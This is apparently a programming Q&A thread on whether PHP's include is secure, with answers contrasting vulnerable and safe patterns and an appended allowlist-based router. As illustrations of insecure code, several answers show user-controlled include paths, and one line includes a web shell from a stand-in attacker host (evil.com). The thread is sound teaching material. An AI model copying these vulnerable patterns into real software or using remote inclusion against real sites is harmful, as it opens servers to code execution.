PHP - Is “include” function secure?

傲寒 2020-12-06 06:28

I'm using the "include" function (e.x. "include 'header2.php'" or "include 'class.users.php'") to add the header or session class in my website. I don't really r

8 answers
  • 2020-12-06 07:09

    Anything server side (assuming your server isn't compromised) is safe. Doing this:

    $var = $_GET['var'];      // file name taken straight from the request
    include $var . ".php";    // the requester decides which file gets loaded
    

    is insecure.

    include "page.php"; 
    

    is secure.

  • 2020-12-06 07:10

    I'm using this method.

    <?php include (dirname(__FILE__).'/file.php');   // path anchored to this script's directory, no user input involved
    
  • 2020-12-06 07:14

    No! An include() is NOT secure. Without considering a single line of code, consider this: include() still allows your script to chug along even if a file fails to load. It will continue to run with a warning. So, this widens the attack vector of your PHP script for the clever malicious user.

    Within a modern application design, why would the inclusion of a file ever need to be optional? If your application is not whole, you want it to fail!

  • 2020-12-06 07:24

    The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable (?include=page.php). As long as you are cautious of these you should be fine.

    if(is_file($file)) {
        //other code, such as user verification and such should also go here
        include $file;
    }
    else { die(); }
    
  • 2020-12-06 07:26

    Include can be abused if you do something like this:

    include($_GET["page"]);
    

    and then call the URL:

    myscript.php?page=index.php

    attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.

    include itself is perfectly safe. Just make sure to always validate/escape your input.

  • 2020-12-06 07:28

    It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

    Insecure (Directory Traversal)

    <?php 
    include($_GET['file']);
    ?>
    

    Insecure (URL fopen - If enabled)

    <?php 
    include('http://evil.com/c99shell.php');
    ?>
    

    Insecure

    <?php 
    include('./some_dir/' . $_GET['file']);
    ?>
    

    Partially Insecure (*.php files are vulnerable)

    <?php 
    include('./some_dir/' . $_GET['file'] . '.php');
    ?>
    

    Secure (Though not sure why anyone would do this.)

    <?php 
    $allowed = array(
        'somefile.php',
        'someotherfile.php'
    );
    
    if (in_array(basename($_GET['file']), $allowed)) {
        include('./includes/' . basename($_GET['file']));
    }
    ?>
    

    Secure

    <?php 
    include('./includes/somefile.php');
    ?>
    
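As an added example that is not part of any of the answers above, here is a page router that combines the allowlist approach from the last answer with a realpath() confinement check and fails closed, as the third answer argues an application should. The include directory, the page names and the `page` query parameter are assumptions.

```php
<?php
// Added example: a small include resolver combining an allowlist of page
// keys with a realpath() confinement check. The directory, file names and
// the 'page' parameter are assumptions, not values from the question.

declare(strict_types=1);

const INCLUDE_DIR = __DIR__ . '/includes';

/** Pages the router is willing to load; anything else is refused. */
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page key to an absolute path inside INCLUDE_DIR,
 * or return null when the request must be refused.
 */
function resolve_page(string $requested): ?string
{
    // 1. Allowlist: the user picks a key, never a file name. The raw input is
    //    never used as a path, so "../", "http://", "php://" and similar
    //    payloads have nothing to act on.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    // 2. Defence in depth: the mapped file must exist and must resolve to a
    //    regular file under INCLUDE_DIR (realpath() also follows symlinks).
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage: refuse anything that did not resolve instead of carrying on.
$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
require $page; // require, not include: a missing file is fatal rather than a warning
```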